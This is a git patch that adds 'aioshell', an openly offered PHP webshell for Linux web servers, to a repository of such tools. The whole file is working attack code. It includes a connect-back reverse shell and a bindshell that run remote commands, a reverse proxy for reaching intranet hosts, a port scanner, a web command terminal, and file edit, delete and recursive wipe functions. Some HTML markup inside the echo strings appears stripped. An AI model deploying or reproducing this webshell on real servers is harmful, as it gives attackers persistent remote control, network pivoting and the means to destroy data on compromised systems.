From 835dee650981990eb9d4668178a262cafdc469ad Mon Sep 17 00:00:00 2001 From: tennc Date: Mon, 30 Mar 2015 21:14:27 +0800 Subject: [PATCH] add aioshell @cloudsec :+1: :v: A php webshell run under linux based webservers. v0.05 by wzt 2014,2015 wzt.wzt@gmail.com url: https://github.com/cloudsec/aioshell --- php/aioshell.php | 1204 ++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 1204 insertions(+) create mode 100644 php/aioshell.php diff --git a/php/aioshell.php b/php/aioshell.php new file mode 100644 index 0000000..4f44db4 --- /dev/null +++ b/php/aioshell.php @@ -0,0 +1,1204 @@ +'; + $fp=@fopen($file_name, "r"); + $data=@fread($fp, filesize($file_name)); + + echo ' + + '; + } + else { + $fp=@fopen($file_name, "w+"); + $result=@fwrite($fp, $_POST['newcontent']); + @fclose($fp); + if ($result == false) { + echo "edit failed."; + } + else { + echo "edit ok."; + } + } +} +function rename_file($old_file_name, $new_file_name) +{ + if (file_exists($old_file_name) == false) { + echo "file $old_file_name not exist.\n"; + return -1; + } + if (rename($old_file_name, $new_file_name) == false) { + echo "rename $old_file_name to $new_file_name failed.\n"; + return -1; + } + echo "rename $old_file_name to $new_file_name ok.\n"; + return 0; +} +function get_human_size($bytes) +{ + $type=array("Bytes", "KB", "MB", "GB", "TB"); + $idx=0; + while ($bytes >= 1024) { + $bytes /= 1024; + $idx++; + } + return (intval($bytes)." ".$type[$idx]); +} +function get_file_perms($file_name) +{ + return (substr(sprintf('%o', fileperms($file_name)), -4)); +} +function get_human_file_perms($file_name) +{ + $perms = fileperms($file_name); + if (($perms & 0xC000) == 0xC000) { + $info = 's'; + } elseif (($perms & 0xA000) == 0xA000) { + $info = 'l'; + } elseif (($perms & 0x8000) == 0x8000) { + $info = '-'; + } elseif (($perms & 0x6000) == 0x6000) { + $info = 'b'; + } elseif (($perms & 0x4000) == 0x4000) { + $info = 'd'; + } elseif (($perms & 0x2000) == 0x2000) { + $info = 'c'; + } elseif (($perms & 0x1000) == 0x1000) { + $info = 'p'; + } else { + $info = 'u'; + } + $info .= (($perms & 0x0100) ? 'r' : '-'); + $info .= (($perms & 0x0080) ? 'w' : '-'); + $info .= (($perms & 0x0040) ? + (($perms & 0x0800) ? 's' : 'x' ) : + (($perms & 0x0800) ? 'S' : '-')); + $info .= (($perms & 0x0020) ? 'r' : '-'); + $info .= (($perms & 0x0010) ? 'w' : '-'); + $info .= (($perms & 0x0008) ? + (($perms & 0x0400) ? 's' : 'x' ) : + (($perms & 0x0400) ? 'S' : '-')); + $info .= (($perms & 0x0004) ? 'r' : '-'); + $info .= (($perms & 0x0002) ? 'w' : '-'); + $info .= (($perms & 0x0001) ? + (($perms & 0x0200) ? 't' : 'x' ) : + (($perms & 0x0200) ? 'T' : '-')); + return $info; +} +function get_file_owner($file_name) +{ + $uid=fileowner($file_name); + $user_info = posix_getpwuid($uid); + return $user_info['name']; +} +function read_dir($dir_path) +{ + if (is_dir($dir_path)) { + if (($dp = opendir($dir_path)) == false) { + echo "open $dir_path failed.\n"; + return -1; + } + while (($file_name = readdir($dp)) != false) { + if ($file_name == "." || $file_name == "..") + continue; + $sub_path = $dir_path."/".$file_name; + echo "$sub_path\n"; + } + } + closedir($dp); + return 0; +} +function read_dirs($dir_path) +{ + echo ' + + + + + + + +'; + if (is_dir($dir_path)) { + if (($dp = opendir($dir_path)) == false) { + echo "open $dir_path failed.\n"; + return -1; + } + while (($file_name = readdir($dp)) != false) { + if ($file_name == "." || $file_name == "..") + continue; + $sub_path = $dir_path."/".$file_name; + $last_modify_time=date("Y/m/d H:i:s", fileatime($file_name)); + $file_size=filesize($file_name); + $file_size_string=get_human_size($file_size); + $file_perms=get_file_perms($file_name); + $file_perms_string=get_human_file_perms($file_name); + $file_owner=get_file_owner($file_name); + + echo ' + + + + + + '; + } + } + echo '
'.$file_name.''.$last_modify_time.''.$file_size_string.''.$file_perms.' / '.$file_perms_string.' / '.$file_owner.'Delete + Edit + Download + Rename +
'; + closedir($dp); + return 0; +} +function aio_directory() +{ + $curr_path=getcwd(); + return read_dirs($curr_path); +} +function search_file_by_name($dir_path, $target_file) +{ + if (is_dir($dir_path)) { + if (($dp = opendir($dir_path)) == false) { + echo "open $dir_path failed.\n"; + return -1; + } + while (($file_name = readdir($dp)) != false) { + if ($file_name == "." || $file_name == "..") + continue; + $sub_path = $dir_path."/".$file_name; + if (is_dir($sub_path)) { + search_file_by_name($sub_path, $target_file); + } + if (!strcmp($file_name, $target_file)) { + echo "found $target_file.\n"; + closedir($dp); + return 0; + } + } + echo "not found $target_file.\n"; + closedir($dp); + } + return -1; +} +/** + * show file attribute with cetern flag. + * + * @dir_path - directroy to search. + * @attr_flag - 0 readable. + * - 1 writeable. + * - 2 executable. + */ +function show_attr_file($dir_path, $attr_flag) +{ + if (is_dir($dir_path)) { + if (($dp = opendir($dir_path)) == false) { + echo "open $dir_path failed.\n"; + return -1; + } + while (($file_name = readdir($dp)) != false) { + if ($file_name == "." || $file_name == "..") + continue; + $sub_path = $dir_path."/".$file_name; + if (is_dir($sub_path)) { + show_attr_file($sub_path, $attr_flag); + } + + if ($attr_flag == 0) { + if (is_readable($file_name)) + echo "$sub_path\n"; + } + else if ($attr_flag == 1) { + if (is_writable($file_name)) + echo "$sub_path\n"; + } + else if ($attr_flag == 2) { + if (is_executable($file_name)) + echo "$sub_path\n"; + } + else { + echo "wrong attribute flag.\n"; + break; + } + } + closedir($dp); + } + return 0; +} +function create_dir($dir_path) +{ + if (file_exists($dir_path)) + return -1; + if (mkdir($dir_path, 0700) == false) { + echo "create $dir_path failed.\n"; + return -1; + } + echo "create $dir_path ok.\n"; + return 0; +} +function destroy_dir($dir_path) +{ + if (file_exists($dir_path) == false) + return -1; + if (rmdir($dir_path) == false) { + echo "delete $dir_path failed.\n"; + return -1; + } + echo "delete $dir_path ok.\n"; + return 0; +} +function destroy_dirs($dir_path) +{ + if (is_dir($dir_path)) { + if (($dp = opendir($dir_path)) == false) { + echo "open $dir_path failed.\n"; + return -1; + } + while (($file_name = readdir($dp)) != false) { + if ($file_name == "." || $file_name == "..") + continue; + $sub_path = $dir_path."/".$file_name; + if (is_dir($sub_path)) { + destroy_dirs($sub_path); + } + else + delete_file($sub_path); + } + closedir($dp); + destroy_dir($dir_path); + return 0; + } + return 0; +} +function linux_id() +{ + $uid = posix_getuid(); + $user_info = posix_getpwuid($uid); + echo "uid=".$uid."(".$user_info['name'].") "; + echo "gid=".$user_info['gid']."(".$user_info['name'].") "; + echo "dir=".$user_info['dir']." "; + echo "shell=".$user_info['shell']."\n"; +} +function linux_uname() +{ + $uname = posix_uname(); + echo $uname['sysname']." ".$uname['nodename']." ".$uname['release']." "; + echo $uname['version']." ".$uname['machine']; +} +function get_proc_name($file_name) +{ + $fp = fopen($file_name, "r"); + if ($fp == false) { + echo "open $file_name failed.\n"; + return -1; + } + while (($buf = fgets($fp, 1024)) != false ) { + if (strstr($buf, "Name:") != NULL) { + sscanf($buf, "%s %s", $tmp, $name); + fclose($fp); + return $name; + } + } + fclose($fp); + return 0; +} +function get_proc_cmd($file_name) +{ + $fp = fopen($file_name, "r"); + if ($fp == false) { + echo "open $file_name failed.\n"; + return -1; + } + $cmd = fgets($fp, 1024); + fclose($fp); + return $cmd; +} +function linux_ps() +{ + if (($dp = opendir("/proc")) == false) { + echo "open /proc failed.\n"; + return -1; + } + echo "open /proc ok.\n"; + while (($file_name = readdir($dp)) != false) { + if ($file_name == "." || $file_name == "..") + continue; + if (ctype_digit($file_name) == false) + continue; + + $dir_path = "/proc/$file_name/status"; + $proc_name = get_proc_name($dir_path); + $dir_path = "/proc/$file_name/cmdline"; + $proc_cmd = get_proc_cmd($dir_path); + echo $file_name."\t\t".$proc_name." ".$proc_cmd."\n"; + } + closedir($dp); + return 0; +} +function tcp_connect($host, $port) +{ + $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); + if ($socket == false) { + echo "create socket error.\n"; + return -1; + } + if (@socket_connect($socket, $host, $port) == false) { + socket_close($socket); + return -1; + } + return $socket; +} +function tcp_connect_timeout($host, $port, $timeout) +{ + $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); + if ($socket == false) { + echo "create socket error.\n"; + return -1; + } + if (socket_set_nonblock($socket) == false) { + echo "set nonblock error.\n"; + socket_close($socket); + return -1; + } + $time = time(); + while (!@socket_connect($socket, $host, $port)) { + $err = socket_last_error($socket); + if ($err == 115 || $err == 114) { + if ((time() - $time) >= $timeout) { + socket_close($socket); + echo "socket timeout.\n"; + return -1; + } + sleep(1); + continue; + } + socket_close($socket); + return -1; + } + + echo "connect to $host:$port ok.\n"; + return $socket; +} +function run_proxy_client($remote_host1, $remote_port1, $remote_host2, $remote_port2) +{ + $socket1 = tcp_connect($remote_host1, $remote_port1); + if ($socket1 == -1) { + echo "connect to $remote_host1:$remote_port1 failed.\n"; + return -1; + } + echo "connect to $remote_host1:$remote_port1 ok.\n"; + $socket2 = tcp_connect($remote_host2, $remote_port2); + if ($socket2 == -1) { + echo "connect to $remote_host2:$remote_port2 failed.\n"; + socket_close($socket1); + return -1; + } + echo "connect to $remote_host2:$remote_port2 ok.\n"; + run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2); + return 0; +} +function web_proxy_client() +{ + echo ' + + +
+ intranet host + + intranet port +
+ public host + + public port +

+ +
+ + '; + if (empty($_POST['intranet_host']) || empty($_POST['intranet_port']) || + empty($_POST['public_host']) || empty($_POST['public_port'])) + return -1; + run_proxy_client($_POST['intranet_host'], $_POST['intranet_port'], + $_POST['public_host'], $_POST['public_port']); +} +function run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2) +{ + while (true) { + $read_sockets = array($socket1, $socket2); + $write_sockets = NULL; + $except_sockets = NULL; + if (socket_select($read_sockets, $write_sockets, $except, 0) == -1) { + echo "socket_select error ".socket_strerror(socket_last_error())."\n"; + break; + } + if (in_array($socket2, $read_sockets)) { + //echo "got data from $remote_host2.\n"; + $bytes2 = socket_recv($socket2, $buf2, 1024, MSG_DONTWAIT); + if ($bytes2 == false) { + echo "socket_recv ".socket_strerror(socket_last_error($socket2))."\n"; + break; + } + //echo "got bytes $bytes2.\n"; + if ($bytes2 == 0) { + echo "recv no data from $remote_host2.\n"; + break; + } + $ret2 = socket_send($socket1, $buf2, $bytes2, MSG_EOR); + if ($ret2 == false) { + echo "socket_send ".socket_strerror(socket_last_error($socket1))."\n"; + break; + } + if ($ret2 != $bytes2) { + echo "send data failed.\n"; + break; + } + //echo "write $ret2 bytes ok.\n"; + } + if (in_array($socket1, $read_sockets)) { + //echo "got data from $remote_host1.\n"; + $bytes1 = socket_recv($socket1, $buf1, 1024, MSG_DONTWAIT); + if ($bytes1 == false) { + echo "socket_recv ".socket_strerror(socket_last_error($socket1))."\n"; + break; + } + //echo "got bytes $bytes1.\n"; + if ($bytes1 == 0) { + echo "recv no data from $remote_host1.\n"; + break; + } + $ret1 = socket_send($socket2, $buf1, $bytes1, MSG_EOR); + if ($ret1 == false) { + echo "socket_send ".socket_strerror(socket_last_error($socket2))."\n"; + break; + } + if ($ret1 != $bytes1) { + echo "send data failed.\n"; + break; + } + //echo "write $ret1 bytes ok.\n"; + } + } + echo "proxy done.\n"; + socket_close($socket1); + socket_close($socket2); + return 0; +} +function init_proxy_server($local_port) +{ + $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); + if ($socket == false) { + echo "create socket error.\n"; + return -1; + } + if (socket_bind($socket, '0', $local_port) == false) { + echo "bind sock error.\n"; + socket_close($socket); + return -1; + } + if (socket_listen($socket) == false) { + echo "listen sock error.\n"; + socket_close($socket); + return -1; + } + echo "listen on port $local_port ok.\n"; + return $socket; +} +function run_proxy_server($local_port1, $local_port2) +{ + $socket1 = init_proxy_server($local_port1); + if ($socket1 == -1) + return -1; + while (true) { + if (($newsock1 = socket_accept($socket1)) !== false) { + socket_getpeername($newsock1, $ip1); + echo "got a client form $ip1\n"; + break; + } + } + $socket2 = init_proxy_server($local_port2); + if ($socket2 == -1) + return -1; + while (true) { + if (($newsock2 = socket_accept($socket2)) !== false) { + socket_getpeername($newsock2, $ip2); + echo "got a client form $ip2\n"; + break; + } + } + echo "start transmit data ...\n"; + run_proxy_core($newsock2, $ip2, $newsock1, $ip1); + socket_close($socket2); + socket_close($socket1); + return 0; +} +function tcp_connect_port($host, $port, $timeout) +{ + $fp = @fsockopen($host, $port, $errno, $errstr, $timeout); + + return $fp; +} +function port_scan_fast($host, $timeout, $banner) +{ +$general_ports = array( + '21'=>'FTP', + '22'=>'SSH', + '23'=>'Telnet', + '25'=>'SMTP', + '79'=>'Finger', + '80'=>'HTTP', + '81'=>'HTTP/Proxy', + '110'=>'POP3', + '135'=>'MS Netbios', + '139'=>'MS Netbios', + '143'=>'IMAP', + '162'=>'SNMP', + '389'=>'LDAP', + '443'=>'HTTPS', + '445'=>'MS SMB', + '873'=>'rsync', + '1080'=>'Proxy/HTTP Server', + '1433'=>'MS SQL Server', + '2433'=>'MS SQL Server Hidden', + '1521'=>'Oracle DB Server', + '1522'=>'Oracle DB Server', + '3128'=>'Squid Cache Server', + '3129'=>'Squid Cache Server', + '3306'=>'MySQL Server', + '3307'=>'MySQL Server', + '3500'=>'Squid Cache Server', + '3389'=>'MS Terminal Service', + '5800'=>'VNC Server', + '5900'=>'VNC Server', + '8080'=>'Proxy/HTTP Server', + '10000'=>'Webmin', + '11211'=>'Memcached' + ); + echo ''; + + foreach($general_ports as $port=>$name) { + if (($fp = tcp_connect_port($host, $port, $timeout)) != false) { + if (empty($banner) == false) { + $data = fgets($fp, 128); + echo ' + + + + + '; + } + else { + echo ' + + + + '; + } + fclose($fp); + } + } + echo '
'.$host.''.$port.''.$name.''.$data.'
'.$host.''.$port.''.$name.'
'; +} +function port_scan($host, $src_port, $dst_port, $timeout, $banner) +{ + echo ' + + + + + '; + for ($port = $src_port; $port <= $dst_port; $port++) { + if (($fp = tcp_connect_port($host, $port, $timeout)) != false) { + if (empty($banner) == false) { + $data = fgets($fp, 128); + echo ' + + + + '; + } + else { + echo ' + + + + '; + } + fclose($fp); + } + } + echo '
HostPortState
'.$host.''.$port.''.$data.'
'.$host.''.$port.'OPEN
'; +} +function run_portscan() +{ + echo ' + + + + +
+ target host + + timeout + + general ports + + banner + + +
+ + '; + if (empty($_POST['scan_host'])) + return -1; + + if (isset($_POST['scan_fast'])) { + port_scan_fast($_POST['scan_host'], $_POST['scan_timeout'], + $_POST['scan_banner']); + } + else { + port_scan($_POST['scan_host'], "1", "65535", + $_POST['scan_timeout'], + $_POST['scan_banner']); + } +} +function linux_exec($socket, $cmd) +{ + $handle = popen($cmd, "r"); + while (($buf = fgets($handle, 1024)) != false) { + $ret = socket_write($socket, $buf, strlen($buf)); + if ($ret == false) { + return -1; + } + } + pclose($handle); + return 0; +} +function connect_backdoor($host, $port) +{ + $banner = "connect back from phpshell\n"; + $socket = tcp_connect($host, $port); + if ($socket == -1) { + echo "connect to $host:$port failed.\n"; + return -1; + } + echo "connect to $host:$port ok.\n"; + $ret = socket_write($socket, $banner, strlen($banner)); + if ($ret == false) { + echo "write data failed.\n"; + socket_close($socket); + return -1; + } + while (true) { + $buf = socket_read($socket, 1024); + echo $buf; + linux_exec($socket, $buf); + } +} +function bindshell($local_port) +{ + $banner = "bindshell from phpshell\n"; + $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); + if ($socket == false) { + echo "create socket error.\n"; + return -1; + } + if (socket_bind($socket, '0', $local_port) == false) { + echo "bind sock error.\n"; + socket_close($socket); + return -1; + } + if (socket_listen($socket) == false) { + echo "listen sock error.\n"; + socket_close($socket); + return -1; + } + echo "listen on port $local_port ok.\n"; + while (true) { + if (($newsock = socket_accept($socket)) !== false) { + socket_getpeername($newsock, $ip); + echo "got a client form $ip"."
"; + break; + } + } + $ret = socket_write($newsock, $banner, strlen($banner)); + if ($ret == false) { + echo "write data failed.\n"; + socket_close($newsock); + socket_close($socket); + return -1; + } + while (true) { + $buf = socket_read($newsock, 1024); + echo $buf; + linux_exec($newsock, $buf); + } + socket_close($newsock); + socket_close($socket); + return 0; +} +function run_backdoor() +{ + echo ' + +
+ Target host + + Target port + + +
+
+ +
+ Bind port + + +
+ '; + if ($_POST['target_host'] && $_POST['target_port']) { + connect_backdoor($_POST['target_host'], $_POST['target_port']); + } + if ($_POST['bind_port']) { + bindshell($_POST['bind_port']); + } +} +/* +function exec_shell($cmd) +{ + $handle = popen($cmd, "r"); + while (($buf = fgets($handle, 1024)) != false) { + echo $buf; + } + pclose($handle); + return 0; +} +function run_shell() +{ + $host_name = gethostbyaddr($_SERVER['SERVER_NAME']); + $uid = posix_getuid(); + $user_info = posix_getpwuid($uid); + echo ' + + + + +
+ '.$user_info['name'].'@'.$host_name.'$ + +

+
'; + } +} +*/ +function run_terminal_shell($cmd) +{ + $handle = popen($cmd, "r"); + while (($buf = fgets($handle, 1024)) != false) { + $data .= $buf.""; + } + pclose($handle); + return $data; +} +function aio_shell() +{ + $host_name = gethostbyaddr($_SERVER['SERVER_NAME']); + $uid = posix_getuid(); + $user_info = posix_getpwuid($uid); + $curr_path = getcwd(); + $prompt=$user_info['name'].'@'.$host_name.':'.$curr_path; + echo ' + + + + + + + + + + + + + + + + + + +
+
'.$prompt.'$'.' + + +
+ +'; +} +function webshell_main() +{ + if (isset($_GET['cmd'])) { + if ($_GET['cmd'] == "backdoor") { + run_backdoor(); + } + if ($_GET['cmd'] == "shell") { + aio_shell(); + } + if ($_GET['cmd'] == "portscan") { + run_portscan(); + } + if ($_GET['cmd'] == "proxy") { + web_proxy_client(); + } + } + else { + echo ' + + + + + + + + + + + '; + } +} +function aio_main() +{ + $uid = posix_getuid(); + $user_info = posix_getpwuid($uid); + $uid_banner="uid=".$uid."(".$user_info['name'].") ". + "gid=".$user_info['gid']."(".$user_info['name'].") ". + "dir=".$user_info['dir']." ". + "shell=".$user_info['shell']; + $uname = posix_uname(); + $uname_banner=$uname['sysname']." ".$uname['nodename']." ".$uname['release']." ". + $uname['version']." ".$uname['machine']; + $server_addr=$_SERVER['SERVER_NAME']; + $server_port= $_SERVER['SERVER_PORT']; + $server_time=date("Y/m/d h:i:s",time()); + $phpsoft=$_SERVER['SERVER_SOFTWARE']; + $php_version=PHP_VERSION; + $zend_version=zend_version(); + $dis_func=get_cfg_var("disable_functions"); + $safemode=@ini_get('safe_mode'); + if ($safemode == false) + $safemode="On"; + $cwd_path=getcwd(); + $total_disk=disk_total_space("/"); + $total_disk_gb=intval($total_disk/(1024*1024*1024)); + $free_disk=disk_free_space("/"); + $free_disk_gb=intval($free_disk/(1024*1024*1024)); +echo ' + + + + + +
+
show directorysconnect backdoorport scanreverse proxycmd shell
+ + + + + + + + + +
+ + + + + + + +
+ +
+ +'; + if ($_GET['cmd']) { + if ($_GET['cmd'] == "dir") { + aio_directory(); + } + if ($_GET['cmd'] == "backdoor") { + run_backdoor(); + } + if ($_GET['cmd'] == "shell") { + aio_shell(); + } + if ($_GET['cmd'] == "portscan") { + run_portscan(); + } + if ($_GET['cmd'] == "proxy") { + web_proxy_client(); + } + } + if ($_GET['delete']) { + delete_file($_GET['delete']); + } + if ($_GET['edit']) { + edit_file($_GET['edit']); + } +} +aio_main(); +?>